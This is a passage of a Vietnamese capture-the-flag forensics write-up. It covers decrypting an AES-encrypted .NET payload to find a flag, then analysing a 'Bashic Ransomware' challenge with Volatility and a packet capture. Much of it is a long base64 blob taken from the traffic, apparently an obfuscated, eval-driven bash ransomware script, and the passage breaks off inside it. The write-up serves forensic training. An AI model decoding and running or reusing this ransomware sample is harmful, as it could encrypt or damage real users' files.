YI5JG5WFASI9yp6AGFpEKYnR+RenAdQ+Z5j4gMlZs0LgH2fbHXXAhIqLh6OhVF2H1Z071E2PNFmypT7v6gfMLGVdIHjXuEJj/jFIqvJ1T2q9F7/paM1ZILQK/QvzvPTB6ioCr3A+HOVCDAc5OfG26R0sUIi+asNcsrPU4/tJXSCYCDHzCabozWnCWq5HFwgKopnam3ZHuxS436xs4SZT3v1RvkoLkEZLlrUhwgXlI7PmpRUbnYHo1Fa25lcvM23QOf0oldx0jF8VVNSKWK98G52TK0h1Bpu+3LUfebuGDg/v6u34oEAnzbXVzYoNVuv4fcefd78WBtQbmqkYWpoq9lGc9oR+cMliEgMSCNhPH9kyaYv71/cD/EScRKnDkkoEZLnQ6lyU+mOJ3Or3PZj9reszg= ``` Oke, bây giờ chúng ta đã có đủ dữ kiện để decrypt. Chuyển all từ đoạn mã cần decrypt, key và iv from base64 to hex và bắt đầu giải. ``` + Đoạn mã : 484583fd1489cf8abddddab573ebb7b5570a3db2df9f57d3af0974d699075f7f8dcdc278d8df9982a6c5fa1f92efac6cbaba16dc30c9e742314d5fcf6d02020d53e33c25770d8bc2736e3817b0055a984f637911cbeeb5f24a5148ada35bd45170e9e3f1d3ae0f278bc077e705b90680b1382a84adb560699739e499bd65e742841546af5eff5270a6c68a5a3dfbce4d44a7da7f3a598e4321c1a0aecdbb86675fb9b3d09d530be8df39d4a6098f5fb4bc2b8fae4b74af40d87988f3417591e6c9f67d49b4804e7b1794fef9ee872452c65311d96d49c7b8656175efbf46e918ed28970ae32ac71a9448645609de92e8b269bb77e49ec0a42ed6f189c1c74b62e1ce91d9b99a0953ca9db4c7bac3342c686ef0ae8384a6cab6ecf17812dd1e231cc79497b81d6f257f793bb46d000c26722a976a4453f756d24ac4f749e582bded6ed8adc70de9e6750ff6145864b2cc3cec09d76c8d10d4bb21cb35722a9887bf195898a8b407780c49808ebf3353851a35a4c74bcca46d59844e4e72ff6db876a2b59c237f8ff3ecb7eb0bd18cf95252b5fee3e672c7a2c50c3ef647dd9f3ae30afffa54e1c4d02539a7c382c83f0b11eb06352ad3d27efa55cd14bd4273d2e296a816ae540726f67cedf27b7ab1c70b3334feff3e1c91368d0cc6b7087a1c7765403b489810b1e11665942f5259e97ee9becba2508272758c9263ca749cb438770c7f648c0e40b0ce0d1bd68470c3201fae658443e54abab3b946fbf105904830d94651688523e02d0ef2c1461d5559228fd26b29f94f8c5c5feb3bde8ed5757252293f8ac91d05208bee2bfdb4cd630e9fbe8f5d8dd4845f6cec9b925144be015b40ab9d0fe9bafc3e31a1c03f8f8e81254fbec0c1f9abcc12e26f4e667287e258b7b859c00942f475d225803d38927bb808a73360af79abed908148b91c3e063d3786851866cd46e1fe63877d3566b1ed03ea89cb06b26b0aadfcd0f51667fa652c96c6abd51b91a05e7af51c6f78c47b9a113719a8e4c4d3f8cb727ce410f407f791ab0e95f6874cc81bfe8bc7d8ab1df9f530c2a7b5c9ec1a23b979f0c678885c56d938f6d6fb195131cda75505aea50bb2f046e7c33874ff70184ad2fe44d0cc1032d78b3a69a91f1eb8fb5242715261a9e6393877640e4a634dcb0aad339335b5171b3c0054305aaf82d8af71dd9157fb91e36e31e548d46130e34d2eb00911349a69e4d60fb6401024a9b048afb70213af5e6a8f3bb86f9748b7d720c32722a3225f2041e8a3d776b6a32a18ff76a11d120627d34f0d779050f30bb9c22eee991d57b6c0c2fcad04dc5859e963be03cd68f5b2e3665979705cb1a128f1ed042ae1dedf73aeba0f92e7e5d3ea546606a97a4306ade4be8d9e0c256db6643ed9a273b8efef1f02503bb0d21ca0534d78176b0f341ef98245167cb0294f812f5d121d764f91b8304869b3a3850f9ee887913849e62811e072385bd600083c3d123cdb043fa390d775a19bf432ac4c3ab7acd82b211f827313a6741981fe020223bcf05106b74e43fea4735a3a199ab377d093c0d83866c16d6b9273228455a06133b60a0fdab06c4676628a922f79a1e715f2107836e4b79040d578d5288a2fc3e8df723673ef1bfddea0d8ec457bd09d76a403dedb3860d6501508ec1cd442423bb3e889c923c3cb43a589a5b54f7f950763e1425580c09975fd521548dbde34e2b5748a74cb88b831c6da498f01fa547320560e6d16cf5668dbc7cb4fdeb3f3295743c9844d4c1eb003980093876876c8b1d6cb73415ab28b6c5b281e01d52fee10d4c480f82c1db69d9298d1d9642662c70cc1ebf325da18986f08814a8da470f1e2a6cb3945e5a6d2cea5700fd88ce0cde617aab5f6fd64ea99260469105531d0c1bf3d00e860813a730c446a82a59bdfe72f9268129e7b7167fe2fd92bc8e4f004a20041217b4bafe0780f12cd206b4eced1dfe9565e8e732ea9bcb2cc6f6df39a9615841702b6821c56915a25fab0b85e677b4fea0763486d68d0a72f22f710985a75764e765fad3dfc60d91f13abb088dee1ba2442758166656d29ed2e7c7ff7efe1275c3856b8d20192082c4c3e5f27030811f43b96ef80e406b2cfcc35187e8a5dc9c4d18e3eae2a2c76d4febbf0aa587598fd3771749c3328cf6712c584ba901cc4af4d68d964edc65fb8494346c1a5b8b6623a75db0137c863bbfe6e32583aedbd9ea1beb6bdfcc88ef8d03ff36d77eaf8f211d6c0ba3a88383cad17d077d51a56229288b2d8e0e3ab90af60bf1864dd48e01adbf7ae0f5916af14dbc5eed832b3d88e9ac199f9135a8d919bd6ddbef13e23eae7bccf9d343d8616ce029a1fd9d56a24cdc36a5b360aef1974e1e0244761a4710ce75418708abdcb6fe2a799ec5f1747279c6235ad09b04da54ba72da0f578550d1cdd3137e83f4841babeb10c9e6815c6d42f983bb8dcdf6d9c0674c23310ea7a08ef14bf557b47719aa8221cf1793d17e078c2c49db0469428f91b961d1121bd689c0e5f5e63ca2c319863d2f1bb83a00fc829acbe2356a074b001f40d71c6a4461b7f7a75100565d0a1118707e62517fe0afef9652803fa11c74b60002b04b20a785f7740eb0ff2e1f37da56708ee749627c0b0164c216d3793a4f7e22bcba604fd057578e9bfd7dbd192f4d062bc5bcbac90d7b41867ae72bbb67628301f486a40818f9f7483f3490c93385c595076196ca020a20e914e70a29a8bb91a110650bc28b478a2202a91f04142bac3dfbe320db5f35fabe94ba367d1844476a1ea6101a46b959741a4c193157eabc5fd1ced3e9579584080f371b49fa3c696bca627f2720d892ec17087a0298e0656b20f17dc1dd7735aa429f3db507c12297622bbb093d186e5cb8ee2e892c2c52ded4885c30a837c97293b2e8d1ee952ef15e26cc84ccae25785cc115e920ab8dc18dbfdb2ae74c3d85d76fba92cf9c7d1ba2448a2ad70b7849791bdf31553c82b355ce9c1080630a85c1297b666b0b45faa90ec23f6977b162becbd7721d520a94b926434a3769bdd5d7a9e18057175f3ad84c311e493ef5d7f7143659246fb770715791288224a00fb121088d46e92d3fa381ce25e059d30b55d5334c0789565bbcce1bddb05f8ebdcfa72fa5d56201723f7cfe78c8e1f6688d42b2091f4197d004896612f96e391222dc0d370211cd949d1e82c88edfb9902be9817b73516d843f4802edac9aeee29aa67ffb2c8f0ac95f33c9b399faee886ca773c30a46892385bdf7787b380cf82a18e684a89d5b553bcd68bd9b2dbeada98343bd95dc0c98dd0a8983aabd237fd103225da4258949e2ac81c1cfb3172907757a410d9dda708dffab4318324a54098d23c02c9a4a86b522d6a11c80cef9b3d2b171b7d8d2839bf2919b7a410607e7af56eff75793f13f5c42cd7b65c27524302772afc1db270ece5107ea59bf7fda21a84acf7b9d6b0a8067644fdac68a89cf18e76251ee18c0d872ebd650aaa888c1ffaefcf165d87695c24c2de13537cdc71623561f05847c686bc927fe83e8765a9e3b6580f5dd75e3ee4c478c52a0f08b978bf82cc828497a89c91210b757ab4f817fa51e6e984d1b9ee080143d30089f673878c068e98c8c7c780d8a8a4a695b53cf4c094d636db90bf27e79b65eb64e4a6bef32aea6e217fa042b62352ce51de740158f59f3d9812e724eda50d0b1a9a4f36b537ac3537ed6a1454942702d857c2eef090d9b0131861515be2256a3648b77912d2c2fc092c98ab7e4d2b6554062ae32e23082ca88328533aa73d957dda964135582517dee1f26c6738aa7c3421075212e6b7b1f15df9e35263e18c9bc7f9aaef69948b14a345cffceeecdac1cdc5b96419241fe171000ec89e7480fd39292bec6cfbd36ef6d0f2647568ed2a3e4e836736df857abe3ca0cf1f7f1687950ddc054f32f6cb8c448248c9785ed74f74e0dd2428a08c3c2b95600789480493cf1ab732219dbab7e8dd85e96e736a25476bbbf746779218bd1ebb54c2612ddc153521958c1de822988dd2e1cd33c463c4b3f1a027ab5b231fc5ba401f6f8fd317f848d091b5b069179f537c5ba7d3636cd1f395530999038418feee1b228fe6cd9c210b56af6eb4c4bcef5eb436649d205cbfe7ab043127cb47712e155b8158dd9b5d5ae333bab0f3cf01dfb5e1e83575a40a591d9367535cd7364415f246514947e9bd372b37dded04e8e649ec7f963cfcd6e174a7de1ce744db1ec8ea7c5324f8bcf677ad8c5fa1e17be607b5182ea46b6f025b04c2e608e491b958501223dca9e80185a442989d1f917a701d43e6798f880c959b342e01f67db1d75c0848a8b87a3a1545d87d59d3bd44d8f3459b2a53eefea07cc2c655d2078d7b84263fe3148aaf2754f6abd17bfe968cd5920b40afd0bf3bcf4c1ea2a02af703e1ce5420c073939f1b6e91d2c5088be6ac35cb2b3d4e3fb495d20980831f309a6e8cd69c25aae4717080aa299da9b7647bb14b8dfac6ce12653defd51be4a0b90464b96b521c205e523b3e6a5151b9d81e8d456b6e6572f336dd039fd2895dc748c5f1554d48a58af7c1b9d932b4875069bbedcb51f79bb860e0fefeaedf8a04027cdb5d5cd8a0d56ebf87dc79f77bf1606d41b9aa9185a9a2af6519cf6847e70c96212031208d84f1fd932698bfbd7f703fc449c44a9c3924a0464b9d0ea5c94fa6389dceaf73d98fdadeb338 + Key : d3175f73ab530640fe334cf153b7a019512b02c6bf36d9152075de1c35225b6d + IV : da19ff27bd7b8ecd4cc1d6dba8c9fb2f ``` Mình ném nó lên [cyberchef](https://gchq.github.io/CyberChef/) để giải. ![](https://i.imgur.com/WFeOtYc.png) =>Mình nhận thấy `1f8b` là header của file gunzip(nhớ để out là hex để dễ nhận thấy) nên dùng tiếp Magic để giải mã và tải nó về : ![](https://i.imgur.com/W8H7yKb.png) Oke tới đây ta chỉ cần mở nó bằng notepad lên xem là thấy flag : ![](https://i.imgur.com/P5cxSK7.png) Hoặc có thể check file PE bằng virustotal ![image](https://hackmd.io/_uploads/HJuRFI6PR.png) Hoặc mở bằng dnSPY(nó được viết bằng Generic CIL Executable(.NET)) để xem ![image](https://hackmd.io/_uploads/rJ455Ipv0.png) ``Flag: HTB{0neN0Te?_iT'5_4_tr4P!}`` ### Bashic Ransomware ![](https://i.imgur.com/VETzYwH.png) #### Giải Pháp Bài cho chúng ta 4 file : ![](https://i.imgur.com/lrhNg53.png) Thì mình chọn file mem để phân tích trước, bài này nó cho profile sẵn cho mình rồi nên không cần phải tạo gì cả :vv => dùng volatility3 để phân tích thôi. Mình dùng plugin bash để phân tích đầu tiền vì nó cho phép người dùng sử dụng các lệnh Bash để thực hiện các tác vụ như xem danh sách tệp tin, thư mục, kiểm tra kết nối mạng, quản lý quyền truy cập và nhiều tác vụ khác. `$python3 vol.py -f forensics.mem linux.bash` ![](https://i.imgur.com/cRZo9zr.png) => có 1 đường link trong đó và mình đã mở nó lên xem thử :vv và cái kết : ![](https://i.imgur.com/41MhdKC.png) oh no. Bị troll rồi @@ . Haizz, mình chuyển hướng sang file pcap để phân tích. File chỉ có chừng này packet : ![](https://i.imgur.com/k6hUBEP.png) => Mình follow tcp.stream để xem thì phát hiện đoạn mã base64 đáng gờm : ![](https://i.imgur.com/Vpb285f.png) ``` Z0g0PSJFZCI7a00wPSJ4U3oiO2M9ImNoIjtMPSI0IjtyUVc9IiI7ZkUxPSJsUSI7cz0iICdLa21aS2ttWkpvUU1nUVhhNFZXQ0pvUVo1Z1RNVVYzTWlkRlJHQjFiNFZVQ0pvZ2JsaEdkZ3NUWGdJU0tuQjNaZ1lYTGdRbWJoMVdidk5HS2tJQ0k0MUNJYkJpWnBsZ0N1VkdhMEJ5T2QxRklpSXpNME16TTJrak4yY2pjbEIzYnNWbWRsUm1JZzBUUGdJU0twMVdZdmgyZG9RaUlnczFXZ1lXYUtvUWZLUVZidU4yTnlJSFJ6STFWdWwyUnhFR1V1QmpkSm9nTnZWMVE1MW1RUWRVZEhsa1RORlRSUWxWVE5sZ0NObGxlMEoyY1VOa05HNUVXQk56TjRoVVRHVlhDS3NISXBnU1o1Z1RNVVYzTWlkRlJHQjFiNFZrQ0swbkNHOVVSSm9RTHQwU0x0MFNMdDBTTHQwU0x0MFNMdDBTTHQwU0x0MFNMdDBTTHQwU0x0MFNMdDBTTHQwU0x0MFNMdDBTTHQwU0x0MFNMdDBTTHQwU0x0MFNMdDBTTHQwU0x0MFNMdDBTTHRrUUNLNFNadWxHYmtGV1prQnljcGhHZGdNM2NwMUdJMDltYmc4R1JnNENkbVZHYmdNWGVoUkdJdVZHZGdVbWRoaEdJMTlXV2c0eWNwQlNaeVZHYTBCQ0xsTm5jMTkyWWdZMlRKa1FDSzhUWnVsR2JrRldaa0JTWWdVbWNsaEdkZ01YU2dvU0NKb2dMekpYWnVkM2Jnd1dkbVJIYW5sbWNnTVhkdmxtZGxKSGNnTUhkcEJ5YjBCeWFqRm1ZZ01XYXNWbWNnVUdhMEJpYnlWSGRsSkhJME5YZHRCU2R2bEhJc1EzY2xKSElsaEdkZ1FIYzVKM1lsUkdJdlJGSXVzbWN2ZEhJbTlHSW05MmJ5QkhJekZHSWtWR2R3bG5jalZHWmdVbVlnNFdZakJpYnZsR2RqVm1adWxHSXlWR2NnVUdicFpHSWw1MlRnNHljdTlXYTBOV2R5UjNjdWxHSXlWM2JnYzNic3gyYm1CU2R2bEhJbWxHSWtWV1owNVdZeUZXZG5CU0p3QVRNZ01YYWdNWFpzbG1aZ0lYZHZsSEluNVdheVZtZHZOV1pTbFFDSm93UHpWR2JwWkdJNTFHSXlWbWR2TldaeUJ5YjBCeWR2aEVJcWtRQ0s0U2VsdEdJbFJYWTJsbWN3QmljMTlHSTBWM2JvUlhhM0JTWnNKV2F6TjNidzFXYWdNWGFnUVhhZ3NUYmxoR2RnUUhjNUozWWxSR0l2UkhJNUYyZGdFR0lrNVdhbUJ5YjBCeVp1bFdleVJISWwxV2EwQmljMTlXZWdVR2R6RjJkZ1EzYnVCeWJFQmlMa1ZHZHdsbmNqNVdaZzRXWmxKR0lsWlhZb0JTZWxoR2RnVTJjMUYyWWxKR0lseG1ZcE4zY2xOMlloQmljbGRtYnZ4R0l2NUdJbEpYWWdNWFpzbG1aZ0lYZHZsSEltOUdJME4zYk5sUUNKb3dQa1ZtYmxCSGNoaEdJMEZHYVhCaUtKa2dDRkpWUVgxMFRUNVVRU0JDVEJsa1VVTlZSU0pWUlVGa1VVaFZSZzRVUWdrbFFnUVVSVUJWV1NOa1RGQlNSU0ZFSVRWRVRKWkVJU1YxVFpsUUNLMFNMdDBTTHQwU0x0MFNMdDBTTHQwU0x0MFNMdDBTTHQwU0x0MFNMdDBTTHQwU0x0MFNMdDBTTHQwU0x0MFNMdDBTTHQwU0x0MFNMdDBTTHQwU0x0MFNMdDBTTHQwU0x0MFNMSmtnQ0c5VVJnMENQOEFDZGhOR0lnQUNJS3NISXBnQ1Z0NTJZM0lqY0VOalVYNVdhSEZUWVE1R00ycGdDOXBBV2pkVk1OZFdkVlpqUXlVVFVvUkVJMFYyY3VWWENLa2dDbDUyYmtsZ0NwWldDZ0FTQ0t3R2IxNTJMMlZHWnY0ak1nSVNha0lDSTExQ0lrVm1jb05YQ0pBQ0lKb0Fic1ZuYnZZWFprOWlQeUFpSXBSaUlnWVROeU1WUkJCeWJueFdZdElYWm9CWGFqMVNMZ01XYXlSWFp0MVdlejFTTGdBRElrWldMbE5YWXloR2N6TlhZdzFTTGdBWFk1VVRZdUlTYWtJQ0l2MUNJelZXZXQwQ0lvTkdkaEpXTHRBeVp3ZEdJOEJDV2pkVk1OZFdkVlpqUXlVVFVvUkVKZzhHYWpWV0NKQUNJSm9nYmxoR2Q3MFZYZ29pSXVvaUlxQVNQaEFTZnB0SEpnczFXZ1lXYUprZ0N2UldDS3NqY2hKbkxxQWllbjVpS2dnbllrdG1McUFpWmtCbkxxQUNlajlHWnVvQ0lqOUdadW9DSTBoSGR1b0NJdWxHSXBCaWN2WldDS2tBSWdvQWNvQm5MMk5XWnk5eWNsZFdZck5XWXc5U2J2Tm1Mc3hXWTBObmJwMVNhd2xIY3VNWFpzbG1adjhpT3pCSGQwaEdJaVUwYmtKSGFteDJSa0ZuY21aMlp4QmtJZ2tuY2g1V2FpMVNZMEZHWnQwQ0lVTjFUUUJDZHpWV2R4Vm1jdDBDSXNKWGRqbEFJZ29RWW9GbVl6Z0dNUUZIUnNoMVo0SkZJMTFDSWtWbWNvTlhDS0FTWW9GbVl6Z0dNUUZIUnNoMVo0SkZJbDFDSUY5R1p5aG1ac2RFWnhKblptZFdjZzhXTGdJU2VsdFVidk5uYmhKbElnSVhMZ01YWjUxU0xnZzJZMEZtWXQwQ0luQjNaSm9RWW9GbVl6Z0dNUUZIUnNoMVo0SkZJK0FDV2pkVk1OZFdkVlpqUXlVVFVvUkVKZzhHYWpWV0NLQTJKdXgxSmdRV0xnSUhkZ3dISTJFREl1MUNJa0ZXWm9CQ2ZnY1NYZHBUYjE1R2JocHpXYmRDSXYxQ0l3Vm1jbkJDZmcwMmJrNVdZeVYzTDJWR1p2QXljbjVXYXlSM2NnMURXamRWTU5kV2RWWmpReVVUVW9SVUNLc0hJcGdpTnZWMVE1MW1RUWRVZEhsa1RORlRSUWxWVE5wZ0M5cEFkelZuYzBCaUk1VjJTdDkyY3VGbVVpQVNlbHRXTDBsR1psMVNMZ0FESWtaV0xrNVdZdDEyYmoxU0xnY0djbkJDZmdJaWJjbG5iY1ZqSWdVV0xnOEdhalZXQ0tRbmN2QlhicDFTTGdjR2NuQkNmZ1VHWnZOV1prMVNMZ1FqTmxOWFlpQkNmZ29HWlBsM01MZHpiMFVtVjVwR2IwUkNJdmgyWWxsZ0NpMFRQUnhFZHdNRlQwTkhNUkJGZXJGMVpyWmxVTUpVZVJwRWVyRmxWQ1pVU1JSV1JWZFdVclJsUnhNRlQwQnpVTXQwWTZaVmNHaEZVTFYxVlpoRmV3a0ZXV05qV0RSbU1UTnpiM05XTkpabFZXSlZWV1pEYXhzRWNPMVdaSUoxUlhCbFFVWmxkTnBXVTBZa2JsTmpUSWRWTkpkMVlSSmxNVDlrU3k0a05XUmxVeXNtZU05RVpWOWtjb2RsVUlSbVJXeGtWWEoyU0tORFpDUjJhVEZqV3ROMlNqUjBWYWhtYWlWelp4d1VVb2gwVDNCbmJhVlRVeE1GVm9CRFQyUlRSaTVFYnpRbWM0YzBWMEJIYmtkRmFZTmxlT2hrVXV4V1JhVmpVdFpsVVNaVVp6SmtWVVpGWncwVU5DcDJZNFIyVmhSbldYbFZkUzEyUUhoMlZPRlRSR1psUzBWVlR5dFdWYVJIZHlNRk1LaDFWTUpGV1U1RWFFOUVkYUZUVWhsVFJVTm5URjFFYW8xV1l3czJNaWRGWkhwbGMwVmxUemMyVmhoM2NUVldlUjUyVnhZbFJWOW1TNloxYUdka1lNQjNkTFZGYndNMmROSmpZRFJHVmpGWE53czBWS0JEVHhJa1ZoaGtSRk5WTnpObFR6eG1hamRsV3FObGEwTmxXMWMyUmlCbld5RVdTNU1VVndRMmFoaEZiWFZWYXdoVlpMNUVTbE5uV1hwRmI0QkRUVlJtZUx0MFp3b2xheGMxVVJKa2FpOUdaRUoyZEZWVll6RUVSWFJqVFg1MGJDeFdVeVVGTWtaRWRwTjFkdjUyVjBwMFJodEVaR0pHTVo1bVdvcEZTVDlVT3RWRlJTcFhXMlEzUmp4bVU2VkZjNHRXVzFVbGFPQkRac05VWTBORVoxY21SVGRIWnFSbGNKVlZWWnhXTVVkblN6UTFkM0pqWXZoR01XWlZPVk5tV2tOVFlNaFdWVXhVTXRWRmNvUkVaRjVrTUxwRmRISlZSS1JrVzJ0V2JPRmxVVUZsY0Z4bVUyTldNaVpuUnowVWR3RmxUTFJtYlU5V09UVlZOU1JVWnpBbk1UcGtUVkptVE9OallJNWtiaWxuV3dRbGRvcEdWeEpsZVVoa1E2SkZjb1pGVjFjM1ZONW1WRmRsZDBBellMQm5WaGwzYUZGV053YzFVR1IzUmlOVFJ0SkdVV1pVVkwxVVZYQkRiWFZtVndaVldLWmxla1prV3JOR1cxVTBWNHBFV09KVFVWVkdjU2RVWUxoMmFhaFVPNVIyVm9WMVV0aFdiYWRuVXdJVmNXZDFZUlZ6YVVsa1ZVOWtUU2hWVXpZVVZQSkVjR0ptV1dGelV4TTJhRDlrVEgxa2RGRlRZdTVVVlJORFp6SUZST05EVDRWMFJWUm5SckpsVzRkMVZXUlhWT2hVTndrMWQ0TTFVRFpFTVJWalRVTmxWdzEyVVBGemFoeEdac0psUldWVllIUjJWUjVtVHJGbGJLdFdVNU5XVlZCSGNuRmxRR1pWVVRaVVZWVmxWSUYyTUdwblUxb1VSU2hsUVc5VWIwTlVUNHBsYU9WblRZVkdlTnBXWU1SbU1PVkZjWUpXTU5abFdYQm5iYTVtVUlOVk5CcFhXNnBGV2pwblRYcFZUTzVXWnhaa2JSMW1SWGwxU25OaldPQkhTUDFtVXUxRWVGUmtZNHBsVmhKelpWZGxjazVXVEV4R1NUQkZkdE5WTktSMFZEeFdSamRFY0ZaRlRrMVdZNWhHV2w1bVE2SmxXYUZ6WTBvVmJsMWtRWTVVTkdSVVRFVnpWUGhHY3dJbWV4czJRMWNtTU1ObFRyTjJNR1ZsWXhNbWFTOW1WNkpXV3hjVVl3cGtSbFJEZEZGR1Z3dFdZQ2hHTWtSblVYTkdTc2hsVXpZMFJqQkhld2tGTW9WVVZGaEhNWlJFWnlza2RSSmpZb2huTVZwSE1GVmxOMXMyWTI5V1VSNWtXeFVGVmtoRVo2TkdTVHBuV3RKMlQwZFZVSGhYUmhSRWNzUmxOS3BuWUpwMU1McG5Xck5WTndkbFlMWlViWkJIYXlZMVRPQlRXTVJYYU5CblF1RldZb3hXVFE1VVJTaEdhcVIxY1daVlpvNUVSbHRFTUhWRmRraFZUV1ZETVZCelpZSmxlanBIVENKRmJYZFhXek0yUnNOellxUm1Sa1ozYXhJbFFPTmpXem9VVlZCbFZXSldlenRtVkU1RVJsSlVPSDFrYnNSMFQyUkRNVzlHYlVGMlQxQXpTTnhtZWtOa1FxTkViYWQxVW9SbVZPWmtVdUptY3Z4bVl1bFRWVTFtV0lKbFNhWjBVdVpVUmFkblJYUjJUYXRXVEN4V1ZpRkhad0VGTUZ4V1lYcDBhU1JrU1ZGbU1zVkZaNmxETVRSRFpXbFZlcloxVnNoV01pVm5SdFIyZHdGa1RTWmxhYVZEYXJaVk5KdDJZd3NtYk9wR2JWcFZVc0pUVk9aRmJWOW1RSVYxUWFaVlRocGxialpsU0VKbGRaaDFWSUJuYlRwR1pGOVVhczVXVllSV1ZsTm5ScU5GZXdOalRWbHphWEJEY0dKRmRTVmtUTEZrUmtWVU50WlZhb2RVVnpnR1ZXSmpXVkoxY3doVlVHQlhianhrU3dNbVcwdG1VUmx6YWFoSE5YSmxlT1ZrWUVoV2JsVnpad1FHU2FwV1p4aDNWVk5qU0dWVk1PUmxUd1JXTVdwblJZTkdNd05qWVVwVWJEUlZNdFJtZHdjbFRNWlVWVVpFWnpzVVdLaDFUYVpWUk5wbFJWNWtjd0FqVXhRWFZrVkhaeFFXVG9wWFYxa2thYVJqVUlKMlFrUmxXSUpGU1Y1a1V4NGtjbjFtVjZKbGVOcG1UNlZGU2FKVFU1cEVTa0ozYkJKR2VPWmtZVjVFUmtWalN0Rm1TeEFUV3FKMU1WbEZhSWQxU0M1bVQ2aHpVUmhrVHNWR2RLcFdWeVVWTVVGRE1YTlZkQ3hXVnhvbFZOTlVNclJtVzRWa1dzNTBST0ZsV0lWV2VaaGxZek1tVmxGRlo2MTBTWjVtVEVoSE1XRkdiWDVVVjVjMFR4Z0hNYUZUU1dwVmVyZGtUc0IzYWpkRWJJMWtNT3AyVTNSR01ORnpiWXBGZFNWRlpFaEdiWjFrVUZSRldXQmpVdWhITVc1a1VyRldlc1psV0xoM2FOWlVPSDFFUlM1MlFKaFdWYWhsVVdsVk1hZFVaMFJXUlg5a1V3VTFWMVUxVFhwVlJodEVjdXBGZENGalVWVnpWVHRrUlVWV2VrWlVaRFJXTVpCSFp4UUZVQ05UVUdwa1JpSkhaRkZHTTBOVlp0cGxSa05WT0RkbGJXZFZVVkIzZFRGemRISldXc2RWVDBvVVJpTmxWR1psTmF0R1ZycFVWVUJ6WXNGbU1qaGtUVHhHTWhaalFFMVVZMGRsWXpoM1JoUlRXVVpsTTRWMFVZVnphWlZGY3JsRldrcG5VSWhuTWlKSGJ0bFZOalpVWm9aVWJVdDBhR0oxTU9oa1Y1ZFdNU0JuUlVkbGNWaDBWWmx6VWtOSGN0UldONElEVnZwMFZUbGxXdXBWTm5wSFRYSmxiVGxrVHJWRmJHSmpZWnAwYVVSVFRzTkZOMEp6U094bVJObFhWc0pHZU9abFV5VWtiakJEYXNOVU1zZGtXeUZrYVRkblZ0cDFkQjVXVFlwMVJhaG5VdGxGYk9Wa1UxeFdiVGRWT1ZabFNPUmxZckpWUmxwa1U2NUVXT2hsVHpJRVdhWlhNSEptY25kMFRDaDJhV3BYUXVGVlZ4czJZUlpWUk5Sa1ZWSmxSd2RHVndRbVJVVm5XRUZHZVZSbFdyWkVWbGhtVnlrbFJrTkRaMWtrYlROalZ5b2xkb1JFWlJ4R01oUlRWd29sU29wWFUyaEdXaWRsUnpFV01PVmtWMG9rTWhwbFdWVmxSazVXV29aRU1XbGtVeXNFU3N0V1lMTkdSbFZFYXNSbVdDTkRaaFJtYU9GVFM2cGxkMEl6WTJZbFJsaFhVNnhFUkNwV1d4b2xWaE5sUXpFV2FDcEhaVGx6UVNObFR3TWxRR0JqV1p4V1ZWSmtWWE5sVUdWa1VLUldiU1pFYndRR1JzQlRZdTUwYURkRmJ4b2xRb0JqV1M1VVJVWkZaWUZWYXNCRFp5ZEdialZ6YXhFbFZrMW1Wd3BrUmpKblNIMTBNS0ZEVHhaVlZScEVicnBWY0d4R1YwSmtlazVrV3FkMVZHWlZWS1JXTWFWa1J3TWxSa2hsVUdKbGVaSkVjbk5sTVJ0V1d2VnphTmxtVFk1VU5HMVdZSFJXVlpKa1JxMVVhd2hsVFl4bVZsUmpVVk5WTVp4V1RVSkZXUGxYVFhSMlJ4Y2xWclpFYlpKa1JWSmxVV1ZWVTBBelZPRkhaVTVFU09kbFl6VTFhWkpGYllWMVN6VlVUWWx6YWhkblNWTm1hc3hXVjJSWGJSaEhPVE5tUTFjVlc2dDJNTVZsVjZ0VVlraDBWcnAxVlhGRmRIUm1ldlpWVjROM1ZOSlRXSFZtUjVVMVl5Um1hVUpFWkVSRmVORkRWRHBrYVdCRGFxTjJRYXQyUTR0bVZrWlhOckZsUm9ORFZNcGtNVXRtVHVObFFLVlZUME1tZVR0bVJzSmxXUzFtWU5wRVdYaFhSc0ZtVnhVMVZheFdWVDVXT0Q1RVNDcG5ZR3BWVlNCVk5GNUVUc1YwVFVKRlZUUnpaRTlFTlZkMFR4ODJkTkJ6WVU1a2NKNUdaNWQzVmloWFZ6MEVkQ1JGWnZKRlNqWkVhWFJHY2Foa1YyZ21SaTFtUndFMmRaMVdVd0pFV09wbVNyTm1NNFVrVDJwMVZaOUVaSWRWV09ORFp6SUVXUzltUldOR01uUmxWdGgzYU50MGJJMUVXMGwzVXJoV1JrWlhTdVJXVTQxbVZIbGpNTWhtV0dSMWIwMVdVNmgyUk9WRlpITlZid0pUVkw1VWJPWlZPRE5tZVdWVVZIcEZXWlZqVFZGbFVzTmpXUHhHVmpCRGF6WVZNTlZWWlV4Mk1WbEdic05FZVMxV1ZXaEhNV2xGZVZKbVFPaFZZdHgyVk5kWFV3UW1kMEFEVFRaME1qTkhaVjFFYUdKald6WUZST05UVDZSbVdTaDFWVVpVUmE5a1NxVmxjRmhWVXBKRVdhUkViSVZtZXNCVFR1WmtlWmRGYkZKR2F3RmxUSmgzYVhWRGJYTmxWT3hHVndVVlZqcFhTVzEwY09ORFpTeDJhVVZrVDZabGRCUlVZeWcyVlRKVFJFSkZOdlowWUhabFZQdEdkSDFVYzFJRFRWcDFhU1JEYllkVlkwdG1XWlJHV1pWa1J3NEVNalIxWUxsMU1PbGxURk5XTndka1dObFRlTmxuVFU1MFZ3VlVUMGtqTUxoa1RXZDFNbnBXVDZSV01XQmxXclpWTUZOVFUybEViaUpEZEg5VWMwbFdZRWhXUmhSVFJHNUVkR1ZrVHV4bVZsQkRhNnRrTU9SMVVwWjFhRE5EY3lFMVJrQmpZNU5ITU4xRWV0SlZXYUJUVnNaVVJQZFhWNnAxTXNOalVJWkViUjVrV3dNV1JzaFZZMUprYlc1a1J1RldZT3BtVjJZVlZTcEViRUpGV1NWVlVGcEVNalpYUlVsVlVrdFdVUFJXVlZSSGNuTkVkd01GVDBCVGVUUlVPRlIxUUNOMVZHUlhSSlJFYkZSMVFXWlVWbkZVTVNGbFFwUmxTa1ZsVURGelVNUkhNVHhrSTlvR1pQbDNNTGR6YjBVbVY1cEdiMGxnQzdCU0tvMFVXNlJuWXpSMVEyWWtUWUYwTTNnSFNOWlVkS2cyY2hKMkx1bG1ZdkV5SQonIHwgciI7SHhKPSJzIjtIYzI9IiI7Zj0iYXMiO2tjRT0icGFzIjtjRWY9ImFlIjtkPSJvIjtWOXo9IjYiO1A4Yz0iaWYiO1U9IiAtZCI7SmM9ImVmIjtOMHE9IiI7dj0iYiI7dz0iZSI7Yj0idiB8IjtUeD0iRWRzIjt4WnA9IiIKeD0kKGV2YWwgIiRIYzIkdyRjJHJRVyRkJHMkdyRiJEhjMiR2JHhacCRmJHckVjl6JHJRV